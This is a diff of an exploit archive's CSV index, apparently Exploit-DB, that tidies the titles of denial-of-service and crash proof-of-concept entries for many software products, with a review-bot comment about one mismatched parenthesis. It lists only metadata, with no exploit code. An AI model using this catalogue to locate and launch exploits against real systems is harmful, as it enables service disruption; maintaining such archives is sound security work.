@@ -1650,7 +1652,7 @@ id,file,description,date,author,platform,type,port
 14582,platforms/windows/dos/14582.pl,"ffdshow Video Codec - Denial of Service",2010-08-08,"Nishant Das Patnaik",windows,dos,0
 14587,platforms/windows/dos/14587.py,"Visual MP3 Splitter & Joiner 6.1 - Denial of Service",2010-08-09,"Oh Yaw Theng",windows,dos,0
 14584,platforms/windows/dos/14584.py,"QQ Computer Manager - 'TSKsp.sys' Local Denial of Service",2010-08-09,"Lufeng Li",windows,dos,0
-14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH)",2010-08-09,s-dz,windows,dos,0
+14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 - ActiveX (PoC) (SEH)",2010-08-09,s-dz,windows,dos,0
 14594,platforms/linux/dos/14594.py,"Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service",2010-08-09,"Jon Oberheide",linux,dos,0
 14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder - Denial of Service",2010-08-10,"Oh Yaw Theng",windows,dos,0
 14601,platforms/windows/dos/14601.py,"Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (PoC)",2010-08-10,anonymous,windows,dos,0
@@ -1767,7 +1769,7 @@ id,file,description,date,author,platform,type,port
 15334,platforms/windows/dos/15334.py,"MinaliC WebServer 1.0 - Denial of Service",2010-10-27,"John Leitch",windows,dos,0
 15426,platforms/windows/dos/15426.txt,"Adobe Flash - ActionIf Integer Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0
 15341,platforms/multiple/dos/15341.html,"Mozilla Firefox - Interleaving document.write and appendChild Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0
-15342,platforms/multiple/dos/15342.html,"Mozilla Firefox - Memory Corruption PoC (Simplified)",2010-10-28,extraexploit,multiple,dos,0
+15342,platforms/multiple/dos/15342.html,"Mozilla Firefox - (Simplified) Memory Corruption (PoC)",2010-10-28,extraexploit,multiple,dos,0
 15346,platforms/multiple/dos/15346.c,"Platinum SDK Library - post upnp sscanf Buffer Overflow",2010-10-28,n00b,multiple,dos,0
 15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service",2010-10-30,"MOHAMED ABDI",windows,dos,0
 15378,platforms/windows/dos/15378.py,"Sybase Advantage Data Architect - '.SQL' Format Heap Overflow",2010-11-01,d0lc3,windows,dos,0
@@ -1837,7 +1839,7 @@ id,file,description,date,author,platform,type,port
 15738,platforms/windows/dos/15738.pl,"Digital Audio Editor 7.6.0.237 - Local Crash (PoC)",2010-12-15,h1ch4m,windows,dos,0
 15739,platforms/windows/dos/15739.pl,"Easy DVD Creator - Local Crash (PoC)",2010-12-15,h1ch4m,windows,dos,0
 15750,platforms/windows/dos/15750.py,"Solar FTP Server 2.0 - Multiple Commands Denial of Service",2010-12-16,modpr0be,windows,dos,0
-15758,platforms/win_x86/dos/15758.c,"Microsoft Windows - Win32k Pointer Dereferencement PoC (MS10-098)",2010-12-17,"Stefan LE BERRE",win_x86,dos,0
+15758,platforms/win_x86/dos/15758.c,"Microsoft Windows - Win32k Pointer Dereferencement (PoC) (MS10-098)",2010-12-17,"Stefan LE BERRE",win_x86,dos,0
 15767,platforms/windows/dos/15767.py,"Ecava IntegraXor Remote - ActiveX Buffer Overflow (PoC)",2010-12-18,"Jeremy Brown",windows,dos,0
 15786,platforms/windows/dos/15786.py,"Accmeware MP3 Joiner Pro 5.0.9 - Denial of Service (PoC)",2010-12-20,0v3r,windows,dos,0
 15787,platforms/windows/dos/15787.py,"Accmeware MP3 Speed 5.0.9 - Denial of Service (PoC)",2010-12-20,0v3r,windows,dos,0
@@ -1897,12 +1899,12 @@ id,file,description,date,author,platform,type,port
 16216,platforms/linux/dos/16216.txt,"RedHat Linux - Stickiness of /tmp Exploit",2011-02-23,"Tavis Ormandy",linux,dos,0
 16230,platforms/windows/dos/16230.py,"Victory FTP Server 5.0 - Denial of Service",2011-02-24,"C4SS!0 G0M3S",windows,dos,0
 16234,platforms/netware/dos/16234.rb,"Novell Netware - RPC XNFS xdrDecodeString",2011-02-24,"Francis Provencher",netware,dos,0
-16237,platforms/windows/dos/16237.py,"Elecard MPEG Player 5.7 - Local Buffer Overflow PoC (SEH)",2011-02-24,badc0re,windows,dos,0
+16237,platforms/windows/dos/16237.py,"Elecard MPEG Player 5.7 - Local Buffer Overflow (PoC) (SEH)",2011-02-24,badc0re,windows,dos,0
 16248,platforms/windows/dos/16248.pl,"eXPert PDF Reader 4.0 - Null Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,windows,dos,0
 16255,platforms/windows/dos/16255.pl,"Magic Music Editor - '.cda' Denial of Service",2011-02-28,AtT4CKxT3rR0r1ST,windows,dos,0
 16260,platforms/windows/dos/16260.py,"Quick 'n Easy FTP Server 3.2 - Denial of Service",2011-02-28,clshack,windows,dos,0
 16261,platforms/multiple/dos/16261.txt,"PHP Exif Extension - 'exif_read_data()' Function Remote Denial of Service",2011-02-28,"_ikki and paradoxengine",multiple,dos,0
-16262,platforms/windows/dos/16262.c,"Microsoft Windows XP - WmiTraceMessageVa Integer Truncation PoC (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos,0
+16262,platforms/windows/dos/16262.c,"Microsoft Windows XP - WmiTraceMessageVa Integer Truncation (PoC) (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos,0
 16263,platforms/linux/dos/16263.c,"Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)",2011-03-02,prdelka,linux,dos,0
 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0
 16284,platforms/unix/dos/16284.rb,"Subversion - Date Svnserve (Metasploit)",2010-08-07,Metasploit,unix,dos,0
@@ -1936,14 +1938,14 @@ id,file,description,date,author,platform,type,port
 17074,platforms/windows/dos/17074.py,"Winamp 5.61 - AVI Denial of Service (PoC)",2011-03-29,BraniX,windows,dos,0
 17075,platforms/windows/dos/17075.py,"Media Player Classic Home Cinema 1.5.0.2827 - '.avi' Denial of Service (PoC)",2011-03-30,BraniX,windows,dos,0
 17145,platforms/windows/dos/17145.pl,"Vallen Zipper 2.30 - '.zip' Heap Overflow",2011-04-11,"C4SS!0 G0M3S",windows,dos,0
-17087,platforms/windows/dos/17087.pl,"Real player 14.0.2.633 - Buffer Overflow / Denial of ServiceExploit",2011-04-01,^Xecuti0N3r,windows,dos,0
+17087,platforms/windows/dos/17087.pl,"Real player 14.0.2.633 - Buffer Overflow / Denial of Service",2011-04-01,^Xecuti0N3r,windows,dos,0
 17089,platforms/windows/dos/17089.pl,"GOM Media Player 2.1.6.3499 - Buffer Overflow / Denial of Service",2011-04-01,^Xecuti0N3r,windows,dos,0
 17097,platforms/bsd/dos/17097.c,"IPComp - encapsulation Unauthenticated kernel memory Corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0
 17120,platforms/multiple/dos/17120.c,"GNU glibc < 2.12.2 - 'fnmatch()' Function Stack Corruption",2011-02-25,"Simon Berry-Byrne",multiple,dos,0
 17133,platforms/windows/dos/17133.c,"Microsoft Windows XP - 'afd.sys' Local Kernel Denial of Service",2011-04-08,"Lufeng Li",windows,dos,0
 17140,platforms/multiple/dos/17140.txt,"Libmodplug ReadS3M - Stack Overflow",2011-04-09,"SEC Consult",multiple,dos,0
-17142,platforms/windows/dos/17142.py,"IrfanView 4.28 - .ICO With Transparent Colour Denial of Service / Remote Denial of Service",2011-04-10,BraniX,windows,dos,0
-17143,platforms/windows/dos/17143.py,"IrfanView 4.28 - .ICO Without Transparent Colour Denial of Service / Remote Denial of Service",2011-04-10,BraniX,windows,dos,0
+17142,platforms/windows/dos/17142.py,"IrfanView 4.28 - '.ICO' With Transparent Colour Denial of Service / Remote Denial of Service",2011-04-10,BraniX,windows,dos,0
+17143,platforms/windows/dos/17143.py,"IrfanView 4.28 - '.ICO' Without Transparent Colour Denial of Service / Remote Denial of Service",2011-04-10,BraniX,windows,dos,0
 17159,platforms/windows/dos/17159.txt,"Microsoft Host Integration Server 8.5.4224.0 - Denial of Service",2011-04-12,"Luigi Auriemma",windows,dos,0
 17160,platforms/windows/dos/17160.txt,"Microsoft Reader 2.1.1.3143 - Integer Overflow (1)",2011-04-12,"Luigi Auriemma",windows,dos,0
 17161,platforms/windows/dos/17161.txt,"Microsoft Reader 2.1.1.3143 - Heap Overflow",2011-04-12,"Luigi Auriemma",windows,dos,0
@@ -1961,7 +1963,7 @@ id,file,description,date,author,platform,type,port
 17287,platforms/windows/dos/17287.mid,"Winamp 5.61 - 'in_midi' Component heap Overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos,0
 17291,platforms/windows/dos/17291.py,"Steam Software - Denial of Service",2011-05-16,david.r.klein,windows,dos,0
 17298,platforms/netware/dos/17298.txt,"Novell Netware eDirectory - Denial of Service",2011-05-16,nSense,netware,dos,0
-17305,platforms/windows/dos/17305.py,"Microsoft Windows Vista/Server 2008 - 'nsiproxy.sys' Local Kernel Denial of Service",2011-05-18,"Lufeng Li",windows,dos,0
+17305,platforms/windows/dos/17305.py,"Microsoft Windows Vista/2008 - 'nsiproxy.sys' Local Kernel Denial of Service",2011-05-18,"Lufeng Li",windows,dos,0
 17351,platforms/hardware/dos/17351.py,"iPhone4 FTP Server 1.0 - Empty CWD-RETR Remote Crash",2011-05-31,offsetIntruder,hardware,dos,0
 17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW - series Authentication Bypass printer flooder",2011-05-31,chrisB,hardware,dos,0
 18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0
@@ -1983,7 +1985,7 @@ id,file,description,date,author,platform,type,port
 17476,platforms/windows/dos/17476.rb,"Microsoft IIS 7.0 FTP Server - Stack Exhaustion Denial of Service (MS09-053) (Metasploit)",2011-07-03,"Myo Soe",windows,dos,0
 17509,platforms/windows/dos/17509.pl,"ZipWiz 2005 5.0 - '.zip' Buffer Corruption Exploit",2011-07-08,"C4SS!0 G0M3S",windows,dos,0
 17497,platforms/windows/dos/17497.txt,"ESTsoft ALPlayer 2.0 - ASX Playlist File Handling Buffer Overflow",2011-07-06,LiquidWorm,windows,dos,0
-17501,platforms/hardware/dos/17501.py,"D-Link DSL-2650U - Denial of Service/PoC",2011-07-07,"Li'el Fridman",hardware,dos,0
+17501,platforms/hardware/dos/17501.py,"D-Link DSL-2650U - Denial of Service (PoC)",2011-07-07,"Li'el Fridman",hardware,dos,0
 17512,platforms/windows/dos/17512.pl,"ZipItFast 3.0 - '.zip' Heap Overflow",2011-07-08,"C4SS!0 G0M3S",windows,dos,0
 17544,platforms/windows/dos/17544.txt,"GDI+ - 'gdiplus.dll' CreateDashedPath Integer Overflow",2011-07-18,Abysssec,windows,dos,0
 17549,platforms/multiple/dos/17549.txt,"Lotus Domino SMTP Router & Email Server and Client - Denial of Service",2011-07-19,Unknown,multiple,dos,0
@@ -2046,10 +2048,10 @@ id,file,description,date,author,platform,type,port
 17963,platforms/windows/dos/17963.txt,"atvise webMI2ADS Web Server 1.0 - Multiple Vulnerabilities",2011-10-10,"Luigi Auriemma",windows,dos,0
 17964,platforms/windows/dos/17964.txt,"IRAI AUTOMGEN 8.0.0.7 - Use-After-Free",2011-10-10,"Luigi Auriemma",windows,dos,0
 17965,platforms/windows/dos/17965.txt,"OPC Systems.NET 4.00.0048 - Denial of Service",2011-10-10,"Luigi Auriemma",windows,dos,0
-17978,platforms/windows/dos/17978.txt,"Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun PoC (MS11-077)",2011-10-13,"Byoungyoung Lee",windows,dos,0
+17978,platforms/windows/dos/17978.txt,"Microsoft Windows - '.fon' Kernel-Mode Buffer Overrun (PoC) (MS11-077)",2011-10-13,"Byoungyoung Lee",windows,dos,0
 17981,platforms/windows/dos/17981.py,"Microsoft Windows - TCP/IP Stack Denial of Service (MS11-064)",2011-10-15,"Byoungyoung Lee",windows,dos,0
 17982,platforms/windows/dos/17982.pl,"BlueZone Desktop - '.zap' file Local Denial of Service",2011-10-15,Silent_Dream,windows,dos,0
-18006,platforms/windows/dos/18006.html,"Opera 11.52 - PoC Denial of Service",2011-10-20,pigtail23,windows,dos,0
+18006,platforms/windows/dos/18006.html,"Opera 11.52 - Denial of Service (PoC)",2011-10-20,pigtail23,windows,dos,0
 18007,platforms/windows/dos/18007.txt,"Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow",2011-10-20,rgod,windows,dos,0
 18008,platforms/windows/dos/18008.html,"Opera 11.52 - Stack Overflow",2011-10-20,pigtail23,windows,dos,0
 18011,platforms/windows/dos/18011.txt,"UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow",2011-10-20,DiGMi,windows,dos,0
@@ -2057,7 +2059,7 @@ id,file,description,date,author,platform,type,port
 18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe Denial of Service (PoC)",2011-10-21,loneferret,windows,dos,0
 18019,platforms/windows/dos/18019.txt,"Google Chrome - Killing Thread (PoC)",2011-10-22,pigtail23,windows,dos,0
 18023,platforms/php/dos/18023.java,"phpLDAPadmin 0.9.4b - Denial of Service",2011-10-23,Alguien,php,dos,0
-18024,platforms/windows/dos/18024.txt,"Microsoft Win32k - Null Pointer De-reference PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0
+18024,platforms/windows/dos/18024.txt,"Microsoft Win32k - Null Pointer De-reference (PoC) (MS11-077)",2011-10-23,KiDebug,windows,dos,0
 18025,platforms/multiple/dos/18025.txt,"Google Chrome - Denial of Service",2011-10-23,"Prashant Uniyal",multiple,dos,0
 18043,platforms/windows/dos/18043.py,"GFI Faxmaker Fax Viewer 10.0 (build 237) - Denial of Service (PoC)",2011-10-28,loneferret,windows,dos,0
 40298,platforms/windows/dos/40298.py,"Goron WebServer 2.0 - Multiple Vulnerabilities",2016-08-29,"Guillaume Kaddouch",windows,dos,80
@@ -2172,7 +2174,7 @@ id,file,description,date,author,platform,type,port
 18739,platforms/windows/dos/18739.txt,"IrfanView FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0
 18751,platforms/hardware/dos/18751.txt,"Samsung D6000 TV - Multiple Vulnerabilities",2012-04-19,"Luigi Auriemma",hardware,dos,0
 18754,platforms/multiple/dos/18754.php,"LibreOffice 3.5.2.2 - Memory Corruption",2012-04-19,shinnai,multiple,dos,0
-18755,platforms/windows/dos/18755.c,"Microsoft Windows - 'afd.sys' PoC (MS11-046)",2012-04-19,fb1h2s,windows,dos,0
+18755,platforms/windows/dos/18755.c,"Microsoft Windows - 'afd.sys' (PoC) (MS11-046)",2012-04-19,fb1h2s,windows,dos,0
 18756,platforms/multiple/dos/18756.txt,"OpenSSL - ASN1 BIO Memory Corruption",2012-04-19,"Tavis Ormandy",multiple,dos,0
 18757,platforms/windows/dos/18757.txt,"VideoLAN VLC Media Player 2.0.1 - '.mp4' Crash (PoC)",2012-04-19,"Senator of Pirates",windows,dos,0
 18758,platforms/multiple/dos/18758.txt,"Wireshark - 'call_dissector()' Null Pointer Dereference Denial of Service",2012-04-19,Wireshark,multiple,dos,0
@@ -2195,7 +2197,7 @@ id,file,description,date,author,platform,type,port
 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0
 18890,platforms/multiple/dos/18890.txt,"Java - Trigerring Java Code from a .SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0
 18909,platforms/php/dos/18909.php,"PHP 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Dereference",2012-05-21,condis,php,dos,0
-18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE PoC (MS12-034)",2012-05-18,Cr4sh,windows,dos,0
+18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034)",2012-05-18,Cr4sh,windows,dos,0
 18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 - Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0
 18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 - '.DAL' File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0
 18910,platforms/php/dos/18910.php,"PHP 5.4.3 - (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0
@@ -2231,7 +2233,7 @@ id,file,description,date,author,platform,type,port
 19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 - '.m3u' Playlist File Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0
 19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0
 19117,platforms/bsd/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",bsd,dos,0
-19137,platforms/hardware/dos/19137.rb,"Wyse - Machine Remote Power off (DOS) without any Privilege (Metasploit)",2012-06-14,it.solunium,hardware,dos,0
+19137,platforms/hardware/dos/19137.rb,"Wyse - Unauthenticated Machine Remote Power Off )Denial of Service) (Metasploit)",2012-06-14,it.solunium,hardware,dos,0
 19413,platforms/windows/dos/19413.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (1)",1999-07-03,Coolio,windows,dos,0
 19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0
 19392,platforms/windows/dos/19392.py,"Able2Extract and Able2Extract Server 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0
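Review bot: The new 19137 description carries a mismatched parenthesis, `)Denial of Service)`, where the intended qualifier is `(Denial of Service)`. Every other record this commit rewrites uses the balanced `(PoC)` / `(Denial of Service)` form, so this one also breaks the convention the commit is establishing. The line should read `+19137,platforms/hardware/dos/19137.rb,"Wyse - Unauthenticated Machine Remote Power Off (Denial of Service) (Metasploit)",2012-06-14,it.solunium,hardware,dos,0`.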
@@ -2355,7 +2357,7 @@ id,file,description,date,author,platform,type,port
 19817,platforms/ultrix/dos/19817.txt,"Data General DG/UX 5.4 - inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",ultrix,dos,0
 19818,platforms/linux/dos/19818.c,"Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service",2000-03-23,"Jay Fenlason",linux,dos,0
 19820,platforms/windows/dos/19820.txt,"AnalogX SimpleServer:WWW 1.0.3 - Denial of Service",2000-03-25,"Presto Chango",windows,dos,0
-19827,platforms/windows/dos/19827.txt,"Microsoft Windows Server 2000/NT 4.0 - TCP/IP Printing Service Denial of Service",2000-03-30,"Ussr Labs",windows,dos,0
+19827,platforms/windows/dos/19827.txt,"Microsoft Windows NT 4/2000 - TCP/IP Printing Service Denial of Service",2000-03-30,"Ussr Labs",windows,dos,0
 19963,platforms/windows/dos/19963.txt,"PHP 6.0 - openssl_verify() Local Buffer Overflow (PoC)",2012-07-20,"Yakir Wizman",windows,dos,0
 19834,platforms/windows/dos/19834.txt,"Real Networks RealPlayer 6/7 - Location Buffer Overflow",2000-04-03,"Adam Muntner",windows,dos,0
 19835,platforms/windows/dos/19835.txt,"SalesLogix Corporation eViewer 1.0 - Denial of Service",2000-03-31,"Todd Beebe",windows,dos,0
@@ -2463,7 +2465,7 @@ id,file,description,date,author,platform,type,port
 20464,platforms/windows/dos/20464.py,"Spytech NetVizor 6.1 - 'services.exe' Denial of Service",2012-08-12,loneferret,windows,dos,0
 20470,platforms/windows/dos/20470.txt,"IBM DB2 - Universal Database for Windows NT 6.1/7.1 SQL Denial of Service",2000-12-05,benjurry,windows,dos,0
 20473,platforms/hardware/dos/20473.pl,"Cisco Catalyst 4000 4.x/5.x / Catalyst 5000 4.5/5.x / Catalyst 6000 5.x - Memory Leak Denial of Service",2000-12-06,blackangels,hardware,dos,0
-20479,platforms/linux/dos/20479.pl,"Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Crash PoC (Null Pointer Dereference)",2012-08-13,kingcope,linux,dos,0
+20479,platforms/linux/dos/20479.pl,"Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Null Pointer Dereference Crash (PoC)",2012-08-13,kingcope,linux,dos,0
 20484,platforms/windows/dos/20484.txt,"OReilly WebSite 1.x/2.0 - win-c-sample.exe Buffer Overflow",1997-01-06,"Solar Designer",windows,dos,0
 20487,platforms/hardware/dos/20487.pl,"Watchguard SOHO 2.2 - Denial of Service",2000-12-08,"Filip Maertens",hardware,dos,0
 20494,platforms/linux/dos/20494.pl,"RedHat Linux 7.0 - Roaring Penguin PPPoE Denial of Service",2000-12-11,dethy,linux,dos,0
@@ -2518,11 +2520,11 @@ id,file,description,date,author,platform,type,port
 20784,platforms/windows/dos/20784.cpp,"Wireshark 1.8.2 / 1.6.0 - Buffer Overflow (PoC)",2012-08-24,X-h4ck,windows,dos,0
 20792,platforms/multiple/dos/20792.txt,"Mercury/NLM 1.4 - Buffer Overflow",2001-04-21,"Przemyslaw Frasunek",multiple,dos,0
 20802,platforms/windows/dos/20802.c,"Microsoft IIS 2.0/3.0 - Long URL Denial of Service",1997-06-21,"Andrea Arcangeli",windows,dos,0
-20810,platforms/multiple/dos/20810.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (1)",1997-11-20,m3lt,multiple,dos,0
-20811,platforms/multiple/dos/20811.cpp,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (2)",1997-11-20,"Konrad Malewski",multiple,dos,0
-20812,platforms/windows/dos/20812.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (3)",1997-11-20,m3lt,windows,dos,0
-20813,platforms/multiple/dos/20813.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (4)",1997-11-20,MondoMan,multiple,dos,0
-20814,platforms/windows/dos/20814.c,"FreeBSD 2.x / HP-UX 9/10/11 / kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5)",1997-11-20,"Dejan Levaja",windows,dos,0
+20810,platforms/multiple/dos/20810.c,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (1)",1997-11-20,m3lt,multiple,dos,0
+20811,platforms/multiple/dos/20811.cpp,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (2)",1997-11-20,"Konrad Malewski",multiple,dos,0
+20812,platforms/windows/dos/20812.c,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (3)",1997-11-20,m3lt,windows,dos,0
+20813,platforms/multiple/dos/20813.c,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (4)",1997-11-20,MondoMan,multiple,dos,0
+20814,platforms/windows/dos/20814.c,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5)",1997-11-20,"Dejan Levaja",windows,dos,0
 20821,platforms/hardware/dos/20821.txt,"Cisco HSRP - Denial of Service",2001-05-03,bashis,hardware,dos,0
 20824,platforms/hardware/dos/20824.txt,"Cisco Catalyst 2900 12.0 - (5.2)XU SNMP Empty UDP Packet Denial of Service",2001-05-03,bashis,hardware,dos,0
 20827,platforms/multiple/dos/20827.pl,"Hughes Technologies DSL_Vdns 1.0 - Denial of Service",2001-05-07,neme-dhc,multiple,dos,0
@@ -2570,7 +2572,7 @@ id,file,description,date,author,platform,type,port
 21099,platforms/windows/dos/21099.c,"Microsoft Windows Server 2000 - RunAs Service Denial of Service",2001-12-11,Camisade,windows,dos,0
 21103,platforms/hardware/dos/21103.c,"D-Link Dl-704 2.56 b5 - IP Fragment Denial of Service",2000-05-23,phonix,hardware,dos,0
 21122,platforms/linux/dos/21122.sh,"Linux Kernel 2.2 / 2.4 - Deep Symbolic Link Denial of Service",2001-10-18,Nergal,linux,dos,0
-21123,platforms/windows/dos/21123.txt,"Microsoft Windows Server 2000/NT - Terminal Server Service RDP Denial of Service",2001-10-18,"Luciano Martins",windows,dos,0
+21123,platforms/windows/dos/21123.txt,"Microsoft Windows NT / 2000 - Terminal Server Service RDP Denial of Service",2001-10-18,"Luciano Martins",windows,dos,0
 21126,platforms/multiple/dos/21126.c,"6Tunnel 0.6/0.7/0.8 - Connection Close State Denial of Service",2001-10-23,awayzzz,multiple,dos,0
 21131,platforms/windows/dos/21131.txt,"Microsoft Windows XP/2000 - GDI Denial of Service",2001-10-29,PeterB,windows,dos,0
 21147,platforms/windows/dos/21147.txt,"WAP Proof 2008 - Denial of Service",2012-09-08,"Orion Einfold",windows,dos,0
@@ -2596,8 +2598,8 @@ id,file,description,date,author,platform,type,port
 21236,platforms/unix/dos/21236.txt,"DNRD 1.x/2.x - DNS Request/Reply Denial of Service",2002-01-20,"Andrew Griffiths",unix,dos,0
 21237,platforms/windows/dos/21237.pl,"Cyberstop Web Server 0.1 - Long Request Denial of Service",2002-01-22,"Alex Hernandez",windows,dos,0
 21240,platforms/windows/dos/21240.txt,"Microsoft Windows XP - '.Manifest' Denial of Service",2002-01-21,mosestycoon,windows,dos,0
-21245,platforms/windows/dos/21245.c,"Microsoft Windows Server 2000/NT 4 - TCP Stack Denial of Service (1)",2001-04-13,3APA3A,windows,dos,0
-21246,platforms/windows/dos/21246.c,"Microsoft Windows Server 2000/NT 4 - TCP Stack Denial of Service (2)",2001-04-13,3APA3A,windows,dos,0
+21245,platforms/windows/dos/21245.c,"Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (1)",2001-04-13,3APA3A,windows,dos,0
+21246,platforms/windows/dos/21246.c,"Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (2)",2001-04-13,3APA3A,windows,dos,0
 21261,platforms/unix/dos/21261.txt,"Tru64 - Malformed TCP Packet Denial of Service",2002-01-31,"Luca Papotti",unix,dos,0
 21262,platforms/linux/dos/21262.txt,"kicq 2.0.0b1 - Invalid ICQ Packet Denial of Service",2002-02-02,"Rafael San Miguel Carrasco",linux,dos,0
 21275,platforms/osx/dos/21275.c,"ICQ For Mac OSX 2.6 Client - Denial of Service",2002-02-05,Stephen,osx,dos,0
@@ -2675,8 +2677,8 @@ id,file,description,date,author,platform,type,port
 21737,platforms/windows/dos/21737.txt,"Cyme ChartFX Client Server - ActiveX Control Array Indexing",2012-10-04,"Francis Provencher",windows,dos,0
 21739,platforms/windows/dos/21739.pl,"JPEGsnoop 1.5.2 - WriteAV Crash (PoC)",2012-10-04,"Jean Pascal Pereira",windows,dos,0
 21741,platforms/windows/dos/21741.txt,"XnView 1.99.1 - '.JLS' File Decompression Heap Overflow",2012-10-04,"Joseph Sheridan",windows,dos,0
-21746,platforms/windows/dos/21746.c,"Microsoft Windows Server 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos,0
-21747,platforms/windows/dos/21747.txt,"Microsoft Windows Server 2000/NT 4/XP - Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,windows,dos,0
+21746,platforms/windows/dos/21746.c,"Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos,0
+21747,platforms/windows/dos/21747.txt,"Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,windows,dos,0
 21756,platforms/hardware/dos/21756.txt,"Belkin F5D6130 Wireless Network Access Point - SNMP Request Denial of Service",2002-08-26,wlanman,hardware,dos,0
 21770,platforms/hardware/dos/21770.c,"Cisco VPN 3000 Series Concentrator Client - Authentication Denial of Service",2002-09-03,Phenoelit,hardware,dos,0
 21775,platforms/linux/dos/21775.c,"SWS Simple Web Server 0.0.3/0.0.4/0.1 - New Line Denial of Service",2002-09-02,saman,linux,dos,0
@@ -2746,7 +2748,7 @@ id,file,description,date,author,platform,type,port
 22110,platforms/php/dos/22110.txt,"PHP-Nuke 6.0 - modules.php Denial of Service",2002-12-23,"Ing. Bernardo Lopez",php,dos,0
 22117,platforms/windows/dos/22117.txt,"iCal 3.7 - Malformed HTTP Request Denial of Service",2003-01-03,"securma massine",windows,dos,0
 22118,platforms/windows/dos/22118.txt,"iCal 3.7 - Remote Buffer Overflow",2003-01-03,"securma massine",windows,dos,0
